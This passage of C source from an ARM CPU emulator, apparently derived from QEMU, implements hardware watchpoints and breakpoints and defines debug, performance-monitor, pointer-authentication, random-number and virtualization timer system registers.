(env->cpu_watchpoint[n]) { cpu_watchpoint_remove_by_ref(CPU(cpu), env->cpu_watchpoint[n]); env->cpu_watchpoint[n] = NULL; } if (!extract64(wcr, 0, 1)) { /* E bit clear : watchpoint disabled */ return; } switch (extract64(wcr, 3, 2)) { case 0: /* LSC 00 is reserved and must behave as if the wp is disabled */ return; case 1: flags |= BP_MEM_READ; break; case 2: flags |= BP_MEM_WRITE; break; case 3: flags |= BP_MEM_ACCESS; break; } /* Attempts to use both MASK and BAS fields simultaneously are * CONSTRAINED UNPREDICTABLE; we opt to ignore BAS in this case, * thus generating a watchpoint for every byte in the masked region. */ mask = extract64(wcr, 24, 4); if (mask == 1 || mask == 2) { /* Reserved values of MASK; we must act as if the mask value was * some non-reserved value, or as if the watchpoint were disabled. * We choose the latter. */ return; } else if (mask) { /* Watchpoint covers an aligned area up to 2GB in size */ len = 1ULL << mask; /* If masked bits in WVR are not zero it's CONSTRAINED UNPREDICTABLE * whether the watchpoint fires when the unmasked bits match; we opt * to generate the exceptions. */ wvr &= ~(len - 1); } else { /* Watchpoint covers bytes defined by the byte address select bits */ int bas = extract64(wcr, 5, 8); int basstart; if (extract64(wvr, 2, 1)) { /* Deprecated case of an only 4-aligned address. BAS[7:4] are * ignored, and BAS[3:0] define which bytes to watch. */ bas &= 0xf; } if (bas == 0) { /* This must act as if the watchpoint is disabled */ return; } /* The BAS bits are supposed to be programmed to indicate a contiguous * range of bytes. Otherwise it is CONSTRAINED UNPREDICTABLE whether * we fire for each byte in the word/doubleword addressed by the WVR. * We choose to ignore any non-zero bits after the first range of 1s. */ basstart = ctz32(bas); len = cto32(bas >> basstart); wvr += basstart; } cpu_watchpoint_insert(CPU(cpu), wvr, len, flags, &env->cpu_watchpoint[n]); } void hw_watchpoint_update_all(ARMCPU *cpu) { int i; CPUARMState *env = &cpu->env; /* Completely clear out existing QEMU watchpoints and our array, to * avoid possible stale entries following migration load. */ cpu_watchpoint_remove_all(CPU(cpu), BP_CPU); memset(env->cpu_watchpoint, 0, sizeof(env->cpu_watchpoint)); for (i = 0; i < ARRAY_SIZE(cpu->env.cpu_watchpoint); i++) { hw_watchpoint_update(cpu, i); } } static void dbgwvr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); int i = ri->crm; /* Bits [63:49] are hardwired to the value of bit [48]; that is, the * register reads and behaves as if values written are sign extended. * Bits [1:0] are RES0. */ value = sextract64(value, 0, 49) & ~3ULL; raw_write(env, ri, value); hw_watchpoint_update(cpu, i); } static void dbgwcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); int i = ri->crm; raw_write(env, ri, value); hw_watchpoint_update(cpu, i); } void hw_breakpoint_update(ARMCPU *cpu, int n) { CPUARMState *env = &cpu->env; uint64_t bvr = env->cp15.dbgbvr[n]; uint64_t bcr = env->cp15.dbgbcr[n]; vaddr addr; int bt; int flags = BP_CPU; if (env->cpu_breakpoint[n]) { cpu_breakpoint_remove_by_ref(CPU(cpu), env->cpu_breakpoint[n]); env->cpu_breakpoint[n] = NULL; } if (!extract64(bcr, 0, 1)) { /* E bit clear : watchpoint disabled */ return; } bt = extract64(bcr, 20, 4); switch (bt) { case 4: /* unlinked address mismatch (reserved if AArch64) */ case 5: /* linked address mismatch (reserved if AArch64) */ qemu_log_mask(LOG_UNIMP, "arm: address mismatch breakpoint types not implemented\n"); return; case 0: /* unlinked address match */ case 1: /* linked address match */ { /* Bits [63:49] are hardwired to the value of bit [48]; that is, * we behave as if the register was sign extended. Bits [1:0] are * RES0. The BAS field is used to allow setting breakpoints on 16 * bit wide instructions; it is CONSTRAINED UNPREDICTABLE whether * a bp will fire if the addresses covered by the bp and the addresses * covered by the insn overlap but the insn doesn't start at the * start of the bp address range. We choose to require the insn and * the bp to have the same address. The constraints on writing to * BAS enforced in dbgbcr_write mean we have only four cases: * 0b0000 => no breakpoint * 0b0011 => breakpoint on addr * 0b1100 => breakpoint on addr + 2 * 0b1111 => breakpoint on addr * See also figure D2-3 in the v8 ARM ARM (DDI0487A.c). */ int bas = extract64(bcr, 5, 4); addr = sextract64(bvr, 0, 49) & ~3ULL; if (bas == 0) { return; } if (bas == 0xc) { addr += 2; } break; } case 2: /* unlinked context ID match */ case 8: /* unlinked VMID match (reserved if no EL2) */ case 10: /* unlinked context ID and VMID match (reserved if no EL2) */ qemu_log_mask(LOG_UNIMP, "arm: unlinked context breakpoint types not implemented\n"); return; case 9: /* linked VMID match (reserved if no EL2) */ case 11: /* linked context ID and VMID match (reserved if no EL2) */ case 3: /* linked context ID match */ default: /* We must generate no events for Linked context matches (unless * they are linked to by some other bp/wp, which is handled in * updates for the linking bp/wp). We choose to also generate no events * for reserved values. */ return; } cpu_breakpoint_insert(CPU(cpu), addr, flags, &env->cpu_breakpoint[n]); } void hw_breakpoint_update_all(ARMCPU *cpu) { int i; CPUARMState *env = &cpu->env; /* Completely clear out existing QEMU breakpoints and our array, to * avoid possible stale entries following migration load. */ cpu_breakpoint_remove_all(CPU(cpu), BP_CPU); memset(env->cpu_breakpoint, 0, sizeof(env->cpu_breakpoint)); for (i = 0; i < ARRAY_SIZE(cpu->env.cpu_breakpoint); i++) { hw_breakpoint_update(cpu, i); } } static void dbgbvr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); int i = ri->crm; raw_write(env, ri, value); hw_breakpoint_update(cpu, i); } static void dbgbcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); int i = ri->crm; /* BAS[3] is a read-only copy of BAS[2], and BAS[1] a read-only * copy of BAS[0]. */ value = deposit64(value, 6, 1, extract64(value, 5, 1)); value = deposit64(value, 8, 1, extract64(value, 7, 1)); raw_write(env, ri, value); hw_breakpoint_update(cpu, i); } static void define_debug_regs(ARMCPU *cpu) { /* Define v7 and v8 architectural debug registers. * These are just dummy implementations for now. */ int i; #ifndef NDEBUG int wrps, brps, ctx_cmps; #else int wrps, brps; #endif ARMCPRegInfo dbgdidr = { .name = "DBGDIDR", .cp = 14, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL0_R, .accessfn = access_tda, .type = ARM_CP_CONST, .resetvalue = cpu->isar.dbgdidr, }; /* Note that all these register fields hold "number of Xs minus 1". */ brps = arm_num_brps(cpu); wrps = arm_num_wrps(cpu); #ifndef NDEBUG ctx_cmps = arm_num_ctx_cmps(cpu); assert(ctx_cmps <= brps); #else arm_num_ctx_cmps(cpu); #endif define_one_arm_cp_reg(cpu, &dbgdidr); define_arm_cp_regs(cpu, debug_cp_reginfo); if (arm_feature(&cpu->env, ARM_FEATURE_LPAE)) { define_arm_cp_regs(cpu, debug_lpae_cp_reginfo); } for (i = 0; i < brps; i++) { ARMCPRegInfo dbgregs[] = { { .name = "DBGBVR", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = i, .opc2 = 4, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.dbgbvr[i]), .writefn = dbgbvr_write, .raw_writefn = raw_write }, { .name = "DBGBCR", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = i, .opc2 = 5, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.dbgbcr[i]), .writefn = dbgbcr_write, .raw_writefn = raw_write }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, dbgregs); } for (i = 0; i < wrps; i++) { ARMCPRegInfo dbgregs[] = { { .name = "DBGWVR", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = i, .opc2 = 6, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.dbgwvr[i]), .writefn = dbgwvr_write, .raw_writefn = raw_write }, { .name = "DBGWCR", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = i, .opc2 = 7, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.dbgwcr[i]), .writefn = dbgwcr_write, .raw_writefn = raw_write }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, dbgregs); } } static void define_pmu_regs(ARMCPU *cpu) { /* * v7 performance monitor control register: same implementor * field as main ID register, and we implement four counters in * addition to the cycle count register. */ unsigned int i, pmcrn = 4; ARMCPRegInfo pmcr = { .name = "PMCR", .cp = 15, .crn = 9, .crm = 12, .opc1 = 0, .opc2 = 0, .access = PL0_RW, .type = ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmcr), .accessfn = pmreg_access, .writefn = pmcr_write, .raw_writefn = raw_write, }; ARMCPRegInfo pmcr64 = { .name = "PMCR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 12, .opc2 = 0, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmcr), .resetvalue = (cpu->midr & 0xff000000) | (pmcrn << PMCRN_SHIFT) | PMCRLC, .writefn = pmcr_write, .raw_writefn = raw_write, }; define_one_arm_cp_reg(cpu, &pmcr); define_one_arm_cp_reg(cpu, &pmcr64); for (i = 0; i < pmcrn; i++) { char *pmevcntr_name = g_strdup_printf("PMEVCNTR%d", i); char *pmevcntr_el0_name = g_strdup_printf("PMEVCNTR%d_EL0", i); char *pmevtyper_name = g_strdup_printf("PMEVTYPER%d", i); char *pmevtyper_el0_name = g_strdup_printf("PMEVTYPER%d_EL0", i); ARMCPRegInfo pmev_regs[] = { { .name = pmevcntr_name, .cp = 15, .crn = 14, .crm = 8 | (3 & (i >> 3)), .opc1 = 0, .opc2 = i & 7, .access = PL0_RW, .type = ARM_CP_IO | ARM_CP_ALIAS, .readfn = pmevcntr_readfn, .writefn = pmevcntr_writefn, .accessfn = pmreg_access }, { .name = pmevcntr_el0_name, .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 8 | (3 & (i >> 3)), .opc2 = i & 7, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_IO, .readfn = pmevcntr_readfn, .writefn = pmevcntr_writefn, .raw_readfn = pmevcntr_rawread, .raw_writefn = pmevcntr_rawwrite }, { .name = pmevtyper_name, .cp = 15, .crn = 14, .crm = 12 | (3 & (i >> 3)), .opc1 = 0, .opc2 = i & 7, .access = PL0_RW, .type = ARM_CP_IO | ARM_CP_ALIAS, .readfn = pmevtyper_readfn, .writefn = pmevtyper_writefn, .accessfn = pmreg_access }, { .name = pmevtyper_el0_name, .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 12 | (3 & (i >> 3)), .opc2 = i & 7, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_IO, .readfn = pmevtyper_readfn, .writefn = pmevtyper_writefn, .raw_writefn = pmevtyper_rawwrite }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, pmev_regs); g_free(pmevcntr_name); g_free(pmevcntr_el0_name); g_free(pmevtyper_name); g_free(pmevtyper_el0_name); } if (cpu_isar_feature(aa32_pmu_8_1, cpu)) { ARMCPRegInfo v81_pmu_regs[] = { { .name = "PMCEID2", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 4, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = extract64(cpu->pmceid0, 32, 32) }, { .name = "PMCEID3", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 5, .access = PL0_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = extract64(cpu->pmceid1, 32, 32) }, REGINFO_SENTINEL }; define_arm_cp_regs(cpu, v81_pmu_regs); } if (cpu_isar_feature(any_pmu_8_4, cpu)) { static const ARMCPRegInfo v84_pmmir = { .name = "PMMIR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 6, .access = PL1_R, .accessfn = pmreg_access, .type = ARM_CP_CONST, .resetvalue = 0 }; define_one_arm_cp_reg(cpu, &v84_pmmir); } } /* We don't know until after realize whether there's a GICv3 * attached, and that is what registers the gicv3 sysregs. * So we have to fill in the GIC fields in ID_PFR/ID_PFR1_EL1/ID_AA64PFR0_EL1 * at runtime. */ static uint64_t id_pfr1_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); uint64_t pfr1 = cpu->id_pfr1; if (env->gicv3state) { pfr1 |= 1 << 28; } return pfr1; } static uint64_t id_aa64pfr0_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); uint64_t pfr0 = cpu->isar.id_aa64pfr0; if (env->gicv3state) { pfr0 |= 1 << 24; } return pfr0; } /* Shared logic between LORID and the rest of the LOR* registers. * Secure state has already been delt with. */ static CPAccessResult access_lor_ns(CPUARMState *env) { int el = arm_current_el(env); if (el < 2 && (arm_hcr_el2_eff(env) & HCR_TLOR)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.scr_el3 & SCR_TLOR)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } static CPAccessResult access_lorid(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_is_secure_below_el3(env)) { /* Access ok in secure mode. */ return CP_ACCESS_OK; } return access_lor_ns(env); } static CPAccessResult access_lor_other(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_is_secure_below_el3(env)) { /* Access denied in secure mode. */ return CP_ACCESS_TRAP; } return access_lor_ns(env); } /* * A trivial implementation of ARMv8.1-LOR leaves all of these * registers fixed at 0, which indicates that there are zero * supported Limited Ordering regions. */ static const ARMCPRegInfo lor_reginfo[] = { { .name = "LORSA_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 0, .access = PL1_RW, .accessfn = access_lor_other, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "LOREA_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 1, .access = PL1_RW, .accessfn = access_lor_other, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "LORN_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 2, .access = PL1_RW, .accessfn = access_lor_other, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "LORC_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 3, .access = PL1_RW, .accessfn = access_lor_other, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "LORID_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 4, .opc2 = 7, .access = PL1_R, .accessfn = access_lorid, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; #ifdef TARGET_AARCH64 static CPAccessResult access_pauth(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); if (el < 2 && arm_feature(env, ARM_FEATURE_EL2) && !(arm_hcr_el2_eff(env) & HCR_APK)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && arm_feature(env, ARM_FEATURE_EL3) && !(env->cp15.scr_el3 & SCR_APK)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } static const ARMCPRegInfo pauth_reginfo[] = { { .name = "APDAKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apda.lo) }, { .name = "APDAKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 2, .opc2 = 1, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apda.hi) }, { .name = "APDBKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 2, .opc2 = 2, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apdb.lo) }, { .name = "APDBKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 2, .opc2 = 3, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apdb.hi) }, { .name = "APGAKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 3, .opc2 = 0, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apga.lo) }, { .name = "APGAKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 3, .opc2 = 1, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apga.hi) }, { .name = "APIAKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 1, .opc2 = 0, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apia.lo) }, { .name = "APIAKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 1, .opc2 = 1, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apia.hi) }, { .name = "APIBKEYLO_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 1, .opc2 = 2, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apib.lo) }, { .name = "APIBKEYHI_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 1, .opc2 = 3, .access = PL1_RW, .accessfn = access_pauth, .fieldoffset = offsetof(CPUARMState, keys.apib.hi) }, REGINFO_SENTINEL }; static uint64_t rndr_readfn(CPUARMState *env, const ARMCPRegInfo *ri) { uint64_t ret; /* Success sets NZCV = 0000. */ env->NF = env->CF = env->VF = 0, env->ZF = 1; if (qemu_guest_getrandom(&ret, sizeof(ret)) < 0) { /* * ??? Failed, for unknown reasons in the crypto subsystem. * The best we can do is log the reason and return the * timed-out indication to the guest. There is no reason * we know to expect this failure to be transitory, so the * guest may well hang retrying the operation. */ //qemu_log_mask(LOG_UNIMP, "%s: Crypto failure: %s", // ri->name, error_get_pretty(err)); env->ZF = 0; /* NZCF = 0100 */ return 0; } return ret; } /* We do not support re-seeding, so the two registers operate the same. */ static const ARMCPRegInfo rndr_reginfo[] = { { .name = "RNDR", .state = ARM_CP_STATE_AA64, .type = ARM_CP_NO_RAW | ARM_CP_SUPPRESS_TB_END | ARM_CP_IO, .opc0 = 3, .opc1 = 3, .crn = 2, .crm = 4, .opc2 = 0, .access = PL0_R, .readfn = rndr_readfn }, { .name = "RNDRRS", .state = ARM_CP_STATE_AA64, .type = ARM_CP_NO_RAW | ARM_CP_SUPPRESS_TB_END | ARM_CP_IO, .opc0 = 3, .opc1 = 3, .crn = 2, .crm = 4, .opc2 = 1, .access = PL0_R, .readfn = rndr_readfn }, REGINFO_SENTINEL }; static void dccvap_writefn(CPUARMState *env, const ARMCPRegInfo *opaque, uint64_t value) { ARMCPU *cpu = env_archcpu(env); struct uc_struct *uc = env->uc; /* CTR_EL0 System register -> DminLine, bits [19:16] */ uint64_t dline_size = 4 << ((cpu->ctr >> 16) & 0xF); uint64_t vaddr_in = (uint64_t) value; uint64_t vaddr = vaddr_in & ~(dline_size - 1); void *haddr; int mem_idx = cpu_mmu_index(env, false); /* This won't be crossing page boundaries */ haddr = probe_read(env, vaddr, dline_size, mem_idx, GETPC()); if (haddr) { ram_addr_t offset; MemoryRegion *mr; /* RCU lock is already being held */ mr = memory_region_from_host(uc, haddr, &offset); if (mr) { // memory_region_do_writeback(mr, offset, dline_size); FIXME } } } static const ARMCPRegInfo dcpop_reg[] = { { .name = "DC_CVAP", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 12, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NO_RAW | ARM_CP_SUPPRESS_TB_END, .accessfn = aa64_cacheop_poc_access, .writefn = dccvap_writefn }, REGINFO_SENTINEL }; static const ARMCPRegInfo dcpodp_reg[] = { { .name = "DC_CVADP", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 13, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NO_RAW | ARM_CP_SUPPRESS_TB_END, .accessfn = aa64_cacheop_poc_access, .writefn = dccvap_writefn }, REGINFO_SENTINEL }; #endif static CPAccessResult access_predinv(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); if (el == 0) { uint64_t sctlr = arm_sctlr(env, el); if (!(sctlr & SCTLR_EnRCTX)) { return CP_ACCESS_TRAP; } } else if (el == 1) { uint64_t hcr = arm_hcr_el2_eff(env); if (hcr & HCR_NV) { return CP_ACCESS_TRAP_EL2; } } return CP_ACCESS_OK; } static const ARMCPRegInfo predinv_reginfo[] = { { .name = "CFP_RCTX", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 3, .opc2 = 4, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, { .name = "DVP_RCTX", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 3, .opc2 = 5, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, { .name = "CPP_RCTX", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 3, .opc2 = 7, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, /* * Note the AArch32 opcodes have a different OPC1. */ { .name = "CFPRCTX", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 7, .crm = 3, .opc2 = 4, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, { .name = "DVPRCTX", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 7, .crm = 3, .opc2 = 5, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, { .name = "CPPRCTX", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 7, .crm = 3, .opc2 = 7, .type = ARM_CP_NOP, .access = PL0_W, .accessfn = access_predinv }, REGINFO_SENTINEL }; static uint64_t ccsidr2_read(CPUARMState *env, const ARMCPRegInfo *ri) { /* Read the high 32 bits of the current CCSIDR */ return extract64(ccsidr_read(env, ri), 32, 32); } static const ARMCPRegInfo ccsidr2_reginfo[] = { { .name = "CCSIDR2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 1, .crn = 0, .crm = 0, .opc2 = 2, .access = PL1_R, .accessfn = access_aa64_tid2, .readfn = ccsidr2_read, .type = ARM_CP_NO_RAW }, REGINFO_SENTINEL }; static CPAccessResult access_aa64_tid3(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if ((arm_current_el(env) < 2) && (arm_hcr_el2_eff(env) & HCR_TID3)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static CPAccessResult access_aa32_tid3(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_feature(env, ARM_FEATURE_V8)) { return access_aa64_tid3(env, ri, isread); } return CP_ACCESS_OK; } static CPAccessResult access_jazelle(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TID0)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static const ARMCPRegInfo jazelle_regs[] = { { .name = "JIDR", .cp = 14, .crn = 0, .crm = 0, .opc1 = 7, .opc2 = 0, .access = PL1_R, .accessfn = access_jazelle, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "JOSCR", .cp = 14, .crn = 1, .crm = 0, .opc1 = 7, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "JMCR", .cp = 14, .crn = 2, .crm = 0, .opc1 = 7, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; static const ARMCPRegInfo vhe_reginfo[] = { { .name = "CONTEXTIDR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 13, .crm = 0, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.contextidr_el[2]) }, { .name = "TTBR1_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 1, .access = PL2_RW, .writefn = vmsa_tcr_ttbr_el2_write, .fieldoffset = offsetof(CPUARMState, cp15.ttbr1_el[2]) }, { .name = "CNTHV_CVAL_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 3, .opc2 = 2, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYPVIRT].cval), .type = ARM_CP_IO, .access = PL2_RW, .writefn = gt_hv_cval_write, .raw_writefn = raw_write }, { .name = "CNTHV_TVAL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL2_RW, .resetfn = gt_hv_timer_reset, .readfn = gt_hv_tval_read, .writefn = gt_hv_tval_write }, { .name = "CNTHV_CTL_EL2", .state = ARM_CP_STATE_BOTH, .type = ARM_CP_IO, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 3, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYPVIRT].ctl), .writefn = gt_hv_ctl_write, .raw_writefn = raw_write }, { .name = "CNTP_CTL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 2, .opc2 = 1, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = e2h_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), .writefn = gt_phys_ctl_write, .raw_writefn = raw_write }, { .name = "CNTV_CTL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 3, .opc2 = 1, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = e2h_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), .writefn = gt_virt_ctl_write, .raw_writefn = raw_write }, { .name = "CNTP_TVAL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = e2h_access, .readfn = gt_phys_tval_read, .writefn = gt_phys_tval_write }, { .name = "CNTV_TVAL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = e2h_access, .readfn = gt_virt_tval_read, .writefn = gt_virt_tval_write }, { .name = "CNTP_CVAL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 2, .opc2 = 2, .type = ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), .access = PL2_RW, .accessfn = e2h_access, .writefn = gt_phys_cval_write, .raw_writefn = raw_write }, { .name = "CNTV_CVAL_EL02", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 5, .crn = 14, .crm = 3, .opc2 = 2, .type = ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), .access = PL2_RW, .accessfn = e2h_access, .writefn = gt_virt_cval_write, .raw_writefn = raw_write }, REGINFO_SENTINEL }; static const ARMCPRegInfo ats1e1_reginfo[] = { { .name = "AT_S1E1R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 9, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E1W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 9, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, REGINFO_SENTINEL }; static const ARMCPRegInfo ats1cp_reginfo[] = { { .name = "ATS1CPRP", .cp = 15, .opc1 = 0, .crn = 7, .crm = 9, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write }, { .name = "ATS1CPWP", .cp = 15, .opc1 = 0, .crn = 7, 